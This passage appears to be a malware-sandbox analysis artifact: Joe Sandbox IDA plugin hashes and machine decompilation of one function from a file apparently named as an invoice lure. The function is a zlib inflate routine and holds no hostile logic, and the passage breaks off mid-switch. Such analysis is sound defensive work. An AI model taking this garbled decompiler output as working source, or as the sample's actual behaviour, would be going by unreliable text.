                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4548ceb1eb57a780950097d580c53503c10ad55e44c5d92bff7efe1e839a3244
                            • Instruction ID: 4b1d947f0eb833285ca509b4458bc32381502175c796c33c5107c03197591d6b
                            • Opcode Fuzzy Hash: 4548ceb1eb57a780950097d580c53503c10ad55e44c5d92bff7efe1e839a3244
                            • Instruction Fuzzy Hash: 7E62CEB1A04B129FC708CF29C48066ABBF1FFC9308F444A2DE9959B785D774E819CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E01314E60() {
                            				signed int _t808;
                            				unsigned int _t810;
                            				signed int _t813;
                            				signed char* _t857;
                            				signed int* _t862;
                            				signed int _t876;
                            				signed int _t886;
                            				signed int _t890;
                            				signed int _t897;
                            				void* _t904;
                            
                            				_t862 =  *(_t904 + 4);
                            				if(_t862 == 0 || _t862[8] == 0 || _t862[9] == 0) {
                            					L376:
                            					return 0xfffffffe;
                            				} else {
                            					_t886 = _t862[7];
                            					 *(_t904 + 0x18) = _t886;
                            					if(_t886 == 0 ||  *_t886 != _t862) {
                            						goto L376;
                            					} else {
                            						_t808 =  *(_t886 + 4);
                            						if(_t808 < 0x3f34 || _t808 > 0x3f53 || _t862[3] == 0 ||  *_t862 == 0 && _t862[1] != 0) {
                            							goto L376;
                            						} else {
                            							if(_t808 == 0x3f3f) {
                            								 *(_t886 + 4) = 0x3f40;
                            							}
                            							_t876 =  *(_t886 + 0x3c);
                            							 *(_t904 + 0x14) = _t862[3];
                            							_t810 = _t862[4];
                            							 *(_t904 + 0x10) = _t810;
                            							 *(_t904 + 0x1c) = _t810;
                            							 *((intOrPtr*)(_t904 + 0x24)) = 0;
                            							_t897 = _t862[1];
                            							_t813 =  *(_t886 + 4) - 0x3f34;
                            							 *(_t904 + 0x10) =  *_t862;
                            							 *(_t904 + 0xc) = _t876;
                            							 *(_t904 + 0x34) = _t897;
                            							_t890 =  *(_t886 + 0x40);
                            							if(_t813 > 0x1e) {
                            								L192:
                            								return 0xfffffffe;
                            							} else {
                            								 *((intOrPtr*)(_t904 + 0x3c)) = _t886 + 0x58;
                            								_t857 =  *(_t904 + 0x14);
                            								do {
                            									switch( *((intOrPtr*)(_t813 * 4 +  &M01316560))) {
                            										case 0:
                            											_t815 =  *(_t886 + 0xc);
                            											if(_t815 != 0) {
                            												__eflags = _t890 - 0x10;
                            												if(_t890 >= 0x10) {
                            													L22:
                            													__eflags = _t815 & 0x00000002;
                            													if((_t815 & 0x00000002) == 0) {
                            														L27:
                            														_t816 =  *(_t886 + 0x24);
                            														 *(_t886 + 0x14) = 0;
                            														__eflags = _t816;
                            														if(_t816 != 0) {
                            															 *(_t816 + 0x30) = 0xffffffff;
                            														}
                            														__eflags =  *(_t886 + 0xc) & 0x00000001;
                            														if(( *(_t886 + 0xc) & 0x00000001) == 0) {
                            															L40:
                            															_t862[6] = "incorrect header check";
                            															 *(_t886 + 4) = 0x3f51;
                            														} else {
                            															_t820 = (_t876 >> 8) + ((_t876 & 0x000000ff) << 8);
                            															__eflags = _t820 % 0x1f;
                            															_t876 =  *(_t904 + 0x10);
                            															if(_t820 % 0x1f != 0) {
                            																_t862 =  *(_t904 + 0x48);
                            																goto L40;
                            															} else {
                            																__eflags = (_t876 & 0x0000000f) - 8;
                            																if((_t876 & 0x0000000f) == 8) {
                            																	_t876 = _t876 >> 4;
                            																	_t890 = _t890 - 4;
                            																	 *(_t904 + 0x10) = _t876;
                            																	_t868 = (_t876 & 0x0000000f) + 8;
                            																	__eflags =  *(_t886 + 0x28);
                            																	if( *(_t886 + 0x28) == 0) {
                            																		 *(_t886 + 0x28) = _t868;
                            																	}
                            																	__eflags = _t868 - 0xf;
                            																	if(_t868 > 0xf) {
                            																		L38:
                            																		_t862 =  *(_t904 + 0x48);
                            																		_t862[6] = "invalid window size";
                            																		 *(_t886 + 4) = 0x3f51;
                            																	} else {
                            																		__eflags = _t868 -  *(_t886 + 0x28);
                            																		if(_t868 >  *(_t886 + 0x28)) {
                            																			goto L38;
                            																		} else {
                            																			_push(0);
                            																			_push(0);
                            																			_push(0);
                            																			 *(_t886 + 0x18) = 1 << _t868;
                            																			_t826 = L01316A20();
                            																			_t881 =  *(_t904 + 0x1c);
                            																			_t904 = _t904 + 0xc;
                            																			_t862 =  *(_t904 + 0x48);
                            																			 *(_t886 + 0x1c) = _t826;
                            																			_t862[0xc] = _t826;
                            																			 *(_t886 + 4) =  !(_t881 >> 8) & 0x00000002 | 0x00003f3d;
                            																			_t876 = 0;
                            																			 *(_t904 + 0x10) = 0;
                            																			_t890 = 0;
                            																		}
                            																	}
                            																} else {
                            																	_t862 =  *(_t904 + 0x48);
                            																	_t862[6] = "unknown compression method";
                            																	 *(_t886 + 4) = 0x3f51;
                            																}
                            															}
                            														}
                            													} else {
                            														__eflags = _t876 - 0x8b1f;
                            														if(_t876 != 0x8b1f) {
                            															goto L27;
                            														} else {
                            															__eflags =  *(_t886 + 0x28);
                            															if( *(_t886 + 0x28) == 0) {
                            																 *(_t886 + 0x28) = 0xf;
                            															}
                            															_push(0);
                            															_push(0);
                            															_push(0);
                            															 *(_t886 + 0x1c) = E01316CA0();
                            															_push(2);
                            															_push(_t904 + 0x24);
                            															 *(_t904 + 0x2c) = 0x8b1f;
                            															_push( *(_t886 + 0x1c));
                            															_t829 = E01316CA0();
                            															_t876 = 0;
                            															 *(_t886 + 0x1c) = _t829;
                            															_t904 = _t904 + 0x18;
                            															 *(_t904 + 0x10) = 0;
                            															_t890 = 0;
                            															 *(_t886 + 4) = 0x3f35;
                            															goto L190;
                            														}
                            													}
                            													goto L191;
                            												} else {
                            													while(1) {
                            														__eflags = _t897;
                            														if(_t897 == 0) {
                            															goto L115;
                            														}
                            														_t852 = ( *_t857 & 0x000000ff) << _t890;
                            														_t857 =  &(_t857[1]);
                            														_t876 = _t876 + _t852;
                            														 *(_t904 + 0x14) = _t857;
                            														_t890 = _t890 + 8;
                            														 *(_t904 + 0x10) = _t876;
                            														_t897 = _t897 - 1;
                            														__eflags = _t890 - 0x10;
                            														if(_t890 < 0x10) {
                            															continue;
                            														} else {
                            															_t815 =  *(_t886 + 0xc);
                            															_t862 =  *(_t904 + 0x48);
                            															goto L22;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											} else {
                            												 *(_t886 + 4) = 0x3f40;
                            												goto L191;
                            											}
                            											goto L377;
                            										case 1:
                            											__eflags = __esi - 0x10;
                            											if(__esi >= 0x10) {
                            												L46:
                            												 *(__edi + 0x14) = __edx;
                            												__eflags = __dl - 8;
                            												if(__dl == 8) {
                            													__eflags = __edx & 0x0000e000;
                            													if((__edx & 0x0000e000) == 0) {
                            														__ecx =  *(__edi + 0x24);
                            														__eflags = __ecx;
                            														if(__ecx != 0) {
                            															__edx = __edx >> 8;
                            															__eax = __edx >> 0x00000008 & 0x00000001;
                            															__eflags = __eax;
                            															 *__ecx = __eax;
                            														}
                            														__eflags =  *(__edi + 0x14) & 0x00000200;
                            														if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            															__eflags =  *(__edi + 0xc) & 0x00000004;
                            															if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            																 *(__esp + 0x18) = __dl;
                            																__eax = __esp + 0x18;
                            																_push(2);
                            																__eflags = __edx;
                            																_push(__eax);
                            																 *(__esp + 0x21) = __dl;
                            																_push( *(__edi + 0x1c));
                            																__eax = E01316CA0();
                            																__esp = __esp + 0xc;
                            																 *(__edi + 0x1c) = __eax;
                            															}
                            														}
                            														__edx = 0;
                            														 *(__edi + 4) = 0x3f36;
                            														 *(__esp + 0x10) = 0;
                            														__esi = 0;
                            														goto L57;
                            													} else {
                            														 *(__ecx + 0x18) = "unknown header flags set";
                            														 *(__edi + 4) = 0x3f51;
                            														goto L191;
                            													}
                            												} else {
                            													 *(__ecx + 0x18) = "unknown compression method";
                            													 *(__edi + 4) = 0x3f51;
                            													goto L191;
                            												}
                            											} else {
                            												while(1) {
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__edx = __edx + __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__eflags = __esi - 0x10;
                            													if(__esi < 0x10) {
                            														continue;
                            													} else {
                            														__ecx =  *(__esp + 0x48);
                            														goto L46;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 2:
                            											__eflags = __esi - 0x20;
                            											if(__esi >= 0x20) {
                            												L59:
                            												__eax =  *(__edi + 0x24);
                            												__eflags = __eax;
                            												if(__eax != 0) {
                            													 *(__eax + 4) = __edx;
                            												}
                            												__eflags =  *(__edi + 0x14) & 0x00000200;
                            												if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            													__eflags =  *(__edi + 0xc) & 0x00000004;
                            													if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            														__eax = __edx;
                            														 *(__esp + 0x18) = __dl;
                            														__eax = __edx >> 8;
                            														 *(__esp + 0x19) = __al;
                            														__edx = __edx >> 0x10;
                            														 *(__esp + 0x1a) = __al;
                            														__eax = __esp + 0x18;
                            														_push(4);
                            														__eflags = __edx;
                            														_push(__eax);
                            														 *(__esp + 0x23) = __dl;
                            														_push( *(__edi + 0x1c));
                            														__eax = E01316CA0();
                            														__esp = __esp + 0xc;
                            														 *(__edi + 0x1c) = __eax;
                            													}
                            												}
                            												__edx = 0;
                            												 *(__edi + 4) = 0x3f37;
                            												 *(__esp + 0x10) = 0;
                            												__esi = 0;
                            												goto L66;
                            											} else {
                            												while(1) {
                            													L57:
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__edx = __edx + __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__eflags = __esi - 0x20;
                            													if(__esi < 0x20) {
                            														continue;
                            													} else {
                            														goto L59;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 3:
                            											__eflags = __esi - 0x10;
                            											if(__esi >= 0x10) {
                            												L68:
                            												__ecx =  *(__edi + 0x24);
                            												__eflags = __ecx;
                            												if(__ecx != 0) {
                            													__eax = __dl & 0x000000ff;
                            													 *(__ecx + 8) = __dl & 0x000000ff;
                            													__ecx = __edx;
                            													__eax =  *(__edi + 0x24);
                            													__ecx = __edx >> 8;
                            													__eflags = __ecx;
                            													 *( *(__edi + 0x24) + 0xc) = __ecx;
                            												}
                            												__eflags =  *(__edi + 0x14) & 0x00000200;
                            												if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            													__eflags =  *(__edi + 0xc) & 0x00000004;
                            													if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            														 *(__esp + 0x18) = __dl;
                            														__eax = __esp + 0x18;
                            														_push(2);
                            														__eflags = __edx;
                            														_push(__eax);
                            														 *(__esp + 0x21) = __dl;
                            														_push( *(__edi + 0x1c));
                            														__eax = E01316CA0();
                            														__esp = __esp + 0xc;
                            														 *(__edi + 0x1c) = __eax;
                            													}
                            												}
                            												__edx = 0;
                            												 *(__edi + 4) = 0x3f38;
                            												 *(__esp + 0x10) = 0;
                            												__esi = 0;
                            												__eflags = 0;
                            												goto L74;
                            											} else {
                            												while(1) {
                            													L66:
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__edx = __edx + __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__eflags = __esi - 0x10;
                            													if(__esi < 0x10) {
                            														continue;
                            													} else {
                            														goto L68;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 4:
                            											L74:
                            											__eflags =  *(__edi + 0x14) & 0x00000400;
                            											if(( *(__edi + 0x14) & 0x00000400) == 0) {
                            												__eax =  *(__edi + 0x24);
                            												__eflags = __eax;
                            												if(__eax != 0) {
                            													 *(__eax + 0x10) = 0;
                            												}
                            												goto L87;
                            											} else {
                            												__eflags = __esi - 0x10;
                            												if(__esi >= 0x10) {
                            													L79:
                            													__eax =  *(__edi + 0x24);
                            													 *(__edi + 0x44) = __edx;
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														 *(__eax + 0x14) = __edx;
                            													}
                            													__eflags =  *(__edi + 0x14) & 0x00000200;
                            													if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															 *(__esp + 0x18) = __dl;
                            															__eax = __esp + 0x18;
                            															_push(2);
                            															__eflags = __edx;
                            															_push(__eax);
                            															 *(__esp + 0x21) = __dl;
                            															_push( *(__edi + 0x1c));
                            															__eax = E01316CA0();
                            															__esp = __esp + 0xc;
                            															 *(__edi + 0x1c) = __eax;
                            														}
                            													}
                            													__ecx = 0;
                            													__esi = 0;
                            													 *(__esp + 0x10) = 0;
                            													L87:
                            													 *(__edi + 4) = 0x3f39;
                            													goto L88;
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x10;
                            														if(__esi < 0x10) {
                            															continue;
                            														} else {
                            															goto L79;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											}
                            											goto L377;
                            										case 5:
                            											L88:
                            											__eflags =  *(__edi + 0x14) & 0x00000400;
                            											if(( *(__edi + 0x14) & 0x00000400) == 0) {
                            												L101:
                            												 *(__edi + 0x44) = 0;
                            												 *(__edi + 4) = 0x3f3a;
                            												goto L102;
                            											} else {
                            												__ecx =  *(__edi + 0x44);
                            												__eflags = __ecx - __ebp;
                            												__ecx = __ecx > __ebp ? __ebp : __ecx;
                            												 *(__esp + 0x30) = __ecx;
                            												__eflags = __ecx;
                            												if(__ecx != 0) {
                            													__edx =  *(__edi + 0x24);
                            													__eflags = __edx;
                            													if(__edx != 0) {
                            														__eax =  *(__edx + 0x10);
                            														 *(__esp + 0x14) = __eax;
                            														__eflags = __eax;
                            														if(__eax != 0) {
                            															__eax =  *(__edx + 0x14);
                            															__eax =  *(__edx + 0x14) -  *(__edi + 0x44);
                            															__edx =  *(__edx + 0x18);
                            															 *(__esp + 0x34) = __eax;
                            															__eflags = __eax - __edx;
                            															__eax =  *(__esp + 0x34);
                            															if(__eflags <= 0) {
                            																__edx = __ecx;
                            															} else {
                            																__edx = __edx - __eax;
                            															}
                            															__eflags = __eax;
                            															__eax = E013189A0(__eax, __ebx, __edx);
                            															__ecx =  *(__esp + 0x3c);
                            														}
                            													}
                            													__eflags =  *(__edi + 0x14) & 0x00000200;
                            													if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															_push(__ecx);
                            															_push(__ebx);
                            															_push( *(__edi + 0x1c));
                            															__eax = E01316CA0();
                            															__esp = __esp + 0xc;
                            															 *(__edi + 0x1c) = __eax;
                            														}
                            													}
                            													__eax =  *(__esp + 0x30);
                            													__ebx = __ebx + __eax;
                            													__ebp = __ebp - __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													_t186 = __edi + 0x44;
                            													 *_t186 =  *(__edi + 0x44) - __eax;
                            													__eflags =  *_t186;
                            												}
                            												__eflags =  *(__edi + 0x44);
                            												if( *(__edi + 0x44) != 0) {
                            													goto L115;
                            												} else {
                            													goto L101;
                            												}
                            											}
                            											goto L377;
                            										case 6:
                            											L102:
                            											__eflags =  *(__edi + 0x14) & 0x00000800;
                            											if(( *(__edi + 0x14) & 0x00000800) == 0) {
                            												__eax =  *(__edi + 0x24);
                            												__eflags = __eax;
                            												if(__eax != 0) {
                            													 *(__eax + 0x1c) = 0;
                            												}
                            												goto L127;
                            											} else {
                            												__eflags = __ebp;
                            												if(__ebp == 0) {
                            													goto L115;
                            												} else {
                            													__ecx = 0;
                            													__eflags = 0;
                            													while(1) {
                            														__eax =  *(__ecx + __ebx) & 0x000000ff;
                            														__ecx = __ecx + 1;
                            														 *(__esp + 0x30) = __eax;
                            														__eax =  *(__edi + 0x24);
                            														__eflags = __eax;
                            														if(__eax != 0) {
                            															__edx =  *(__eax + 0x1c);
                            															__eflags =  *(__eax + 0x1c);
                            															if( *(__eax + 0x1c) != 0) {
                            																__edx =  *(__edi + 0x44);
                            																__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
                            																if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
                            																	__eax =  *(__eax + 0x1c);
                            																	__ebx =  *(__esp + 0x30);
                            																	 *(__eax + __edx) = __bl;
                            																	_t203 = __edi + 0x44;
                            																	 *_t203 =  *(__edi + 0x44) + 1;
                            																	__eflags =  *_t203;
                            																	__ebx =  *(__esp + 0x14);
                            																}
                            															}
                            														}
                            														__eax =  *(__esp + 0x30);
                            														__eflags = __eax;
                            														if(__eax == 0) {
                            															break;
                            														}
                            														__eflags = __ecx - __ebp;
                            														if(__ecx < __ebp) {
                            															continue;
                            														}
                            														break;
                            													}
                            													__eflags =  *(__edi + 0x14) & 0x00000200;
                            													 *(__esp + 0x34) = __ecx;
                            													if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															_push(__ecx);
                            															_push(__ebx);
                            															_push( *(__edi + 0x1c));
                            															__eax = E01316CA0();
                            															__ecx =  *(__esp + 0x40);
                            															__esp = __esp + 0xc;
                            															 *(__edi + 0x1c) = __eax;
                            															__eax =  *(__esp + 0x30);
                            														}
                            													}
                            													__ebx = __ebx + __ecx;
                            													__ebp = __ebp - __ecx;
                            													 *(__esp + 0x14) = __ebx;
                            													__eflags = __eax;
                            													if(__eax == 0) {
                            														L127:
                            														 *(__edi + 0x44) = 0;
                            														 *(__edi + 4) = 0x3f3b;
                            														goto L128;
                            													} else {
                            														goto L115;
                            													}
                            												}
                            											}
                            											goto L377;
                            										case 7:
                            											L128:
                            											__eflags =  *(__edi + 0x14) & 0x00001000;
                            											if(( *(__edi + 0x14) & 0x00001000) == 0) {
                            												__eax =  *(__edi + 0x24);
                            												__eflags = __eax;
                            												if(__eax != 0) {
                            													 *(__eax + 0x24) = 0;
                            												}
                            												goto L144;
                            											} else {
                            												__eflags = __ebp;
                            												if(__ebp == 0) {
                            													goto L115;
                            												} else {
                            													__ecx = 0;
                            													__eflags = 0;
                            													while(1) {
                            														__eax =  *(__ecx + __ebx) & 0x000000ff;
                            														__ecx = __ecx + 1;
                            														 *(__esp + 0x30) = __eax;
                            														__eax =  *(__edi + 0x24);
                            														__eflags = __eax;
                            														if(__eax != 0) {
                            															__edx =  *(__eax + 0x24);
                            															__eflags =  *(__eax + 0x24);
                            															if( *(__eax + 0x24) != 0) {
                            																__edx =  *(__edi + 0x44);
                            																__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
                            																if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
                            																	__eax =  *(__eax + 0x24);
                            																	__ebx =  *(__esp + 0x30);
                            																	 *(__eax + __edx) = __bl;
                            																	_t254 = __edi + 0x44;
                            																	 *_t254 =  *(__edi + 0x44) + 1;
                            																	__eflags =  *_t254;
                            																	__ebx =  *(__esp + 0x14);
                            																}
                            															}
                            														}
                            														__eax =  *(__esp + 0x30);
                            														__eflags = __eax;
                            														if(__eax == 0) {
                            															break;
                            														}
                            														__eflags = __ecx - __ebp;
                            														if(__ecx < __ebp) {
                            															continue;
                            														}
                            														break;
                            													}
                            													__eflags =  *(__edi + 0x14) & 0x00000200;
                            													 *(__esp + 0x34) = __ecx;
                            													if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															_push(__ecx);
                            															_push(__ebx);
                            															_push( *(__edi + 0x1c));
                            															__eax = E01316CA0();
                            															__ecx =  *(__esp + 0x40);
                            															__esp = __esp + 0xc;
                            															 *(__edi + 0x1c) = __eax;
                            															__eax =  *(__esp + 0x30);
                            														}
                            													}
                            													__ebx = __ebx + __ecx;
                            													__ebp = __ebp - __ecx;
                            													 *(__esp + 0x14) = __ebx;
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														goto L115;
                            													} else {
                            														L144:
                            														__edx =  *(__esp + 0x10);
                            														 *(__edi + 4) = 0x3f3c;
                            														goto L145;
                            													}
                            												}
                            											}
                            											goto L377;
                            										case 8:
                            											L145:
                            											__eflags =  *(__edi + 0x14) & 0x00000200;
                            											if(( *(__edi + 0x14) & 0x00000200) == 0) {
                            												L153:
                            												__ecx =  *(__edi + 0x24);
                            												__eflags = __ecx;
                            												if(__ecx != 0) {
                            													 *(__edi + 0x14) =  *(__edi + 0x14) >> 9;
                            													__eax =  *(__edi + 0x14) >> 0x00000009 & 0x00000001;
                            													__eflags = __eax;
                            													 *(__ecx + 0x2c) = __eax;
                            													__eax =  *(__edi + 0x24);
                            													 *( *(__edi + 0x24) + 0x30) = 1;
                            												}
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												__eax = E01316CA0();
                            												__ecx =  *(__esp + 0x54);
                            												__esp = __esp + 0xc;
                            												__edx =  *(__esp + 0x10);
                            												 *(__edi + 0x1c) = __eax;
                            												 *(__ecx + 0x30) = __eax;
                            												 *(__edi + 4) = 0x3f3f;
                            												goto L191;
                            											} else {
                            												__eflags = __esi - 0x10;
                            												if(__esi >= 0x10) {
                            													L149:
                            													__eflags =  *(__edi + 0xc) & 0x00000004;
                            													if(( *(__edi + 0xc) & 0x00000004) == 0) {
                            														L152:
                            														__ecx = 0;
                            														__esi = 0;
                            														__eflags = 0;
                            														 *(__esp + 0x10) = 0;
                            														goto L153;
                            													} else {
                            														__eax =  *(__edi + 0x1c) & 0x0000ffff;
                            														__eflags = __edx - ( *(__edi + 0x1c) & 0x0000ffff);
                            														if(__edx == ( *(__edi + 0x1c) & 0x0000ffff)) {
                            															goto L152;
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															 *(__ecx + 0x18) = "header crc mismatch";
                            															 *(__edi + 4) = 0x3f51;
                            														}
                            													}
                            													goto L191;
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x10;
                            														if(__esi < 0x10) {
                            															continue;
                            														} else {
                            															goto L149;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											}
                            											goto L377;
                            										case 9:
                            											__eflags = __esi - 0x20;
                            											if(__esi >= 0x20) {
                            												L160:
                            												__ecx = __edx;
                            												__edx = __edx << 0x10;
                            												__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
                            												__edx = __edx >> 8;
                            												__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                            												__eax = __edx >> 0x00000008 & 0x0000ff00;
                            												__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                            												__edx = __edx >> 0x18;
                            												__ecx =  *(__esp + 0x48);
                            												__eax = __eax + __edx;
                            												__edx = 0;
                            												 *(__edi + 0x1c) = __eax;
                            												 *(__esp + 0x10) = 0;
                            												__esi = 0;
                            												__eflags = 0;
                            												 *(__ecx + 0x30) = __eax;
                            												 *(__edi + 4) = 0x3f3e;
                            												goto L161;
                            											} else {
                            												asm("o16 nop [eax+eax]");
                            												while(1) {
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__edx = __edx + __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__eflags = __esi - 0x20;
                            													if(__esi < 0x20) {
                            														continue;
                            													} else {
                            														goto L160;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 0xa:
                            											L161:
                            											__eflags =  *(__edi + 0x10);
                            											if( *(__edi + 0x10) == 0) {
                            												__eax =  *(__esp + 0x20);
                            												 *(__ecx + 0xc) =  *(__esp + 0x20);
                            												__eax =  *(__esp + 0x1c);
                            												 *(__ecx + 0x10) =  *(__esp + 0x1c);
                            												__eax = 2;
                            												 *__ecx = __ebx;
                            												 *(__ecx + 4) = __ebp;
                            												 *(__edi + 0x40) = __esi;
                            												_pop(__esi);
                            												_pop(__ebp);
                            												_pop(__ebx);
                            												 *(__edi + 0x3c) = __edx;
                            												return 2;
                            											} else {
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												__eax = L01316A20();
                            												__ecx =  *(__esp + 0x54);
                            												__esp = __esp + 0xc;
                            												__edx =  *(__esp + 0x10);
                            												 *(__edi + 0x1c) = __eax;
                            												 *(__ecx + 0x30) = __eax;
                            												 *(__edi + 4) = 0x3f3f;
                            												goto L163;
                            											}
                            											goto L377;
                            										case 0xb:
                            											L163:
                            											__eax =  *(__esp + 0x4c);
                            											__eflags = __eax - 5;
                            											if(__eax == 5) {
                            												L359:
                            												__edi =  *(__esp + 0x10);
                            												__edx = __eax;
                            												goto L117;
                            											} else {
                            												__eflags = __eax - 6;
                            												if(__eax == 6) {
                            													goto L359;
                            												} else {
                            													goto L165;
                            												}
                            											}
                            											goto L377;
                            										case 0xc:
                            											L165:
                            											__eflags =  *(__edi + 8);
                            											if( *(__edi + 8) == 0) {
                            												__eflags = __esi - 3;
                            												if(__esi >= 3) {
                            													L170:
                            													__eax = __edx;
                            													__edx = __edx >> 1;
                            													 *(__edi + 8) = __eax;
                            													__eax = __edx;
                            													__eax = __edx & 0x00000003;
                            													switch( *((intOrPtr*)((__edx & 0x00000003) * 4 +  &M013165DC))) {
                            														case 0:
                            															 *(__edi + 4) = 0x3f41;
                            															goto L172;
                            														case 1:
                            															__eflags =  *(__esp + 0x4c) - 6;
                            															 *(__edi + 0x50) = 0x1331a30;
                            															 *(__edi + 0x58) = 9;
                            															 *(__edi + 0x54) = 0x1332230;
                            															 *(__edi + 0x5c) = 5;
                            															 *(__edi + 4) = 0x3f47;
                            															if( *(__esp + 0x4c) != 6) {
                            																L172:
                            																__ecx =  *(__esp + 0x48);
                            																__edx = __edx >> 2;
                            																__esi = __esi - 3;
                            																 *(__esp + 0x10) = __edx;
                            																goto L191;
                            															} else {
                            																__edx = __edx >> 2;
                            																__esi = __esi - 3;
                            																 *(__esp + 0x10) = __edx;
                            																goto L115;
                            															}
                            															goto L377;
                            														case 2:
                            															__ecx =  *(__esp + 0x48);
                            															__edx = __edx >> 2;
                            															__esi = __esi - 3;
                            															 *(__edi + 4) = 0x3f44;
                            															 *(__esp + 0x10) = __edx;
                            															goto L191;
                            														case 3:
                            															__ecx =  *(__esp + 0x48);
                            															__edx = __edx >> 2;
                            															__esi = __esi - 3;
                            															 *(__esp + 0x10) = __edx;
                            															 *(__ecx + 0x18) = "invalid block type";
                            															 *(__edi + 4) = 0x3f51;
                            															goto L191;
                            													}
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 3;
                            														if(__esi < 3) {
                            															continue;
                            														} else {
                            															goto L170;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											} else {
                            												__ecx = __esi;
                            												 *(__edi + 4) = 0x3f4e;
                            												__ecx = __esi & 0x00000007;
                            												__edx = __edx >> __cl;
                            												__esi = __esi - __ecx;
                            												 *(__esp + 0x10) = __edx;
                            												goto L190;
                            											}
                            											goto L377;
                            										case 0xd:
                            											__esi = __esi & 0x00000007;
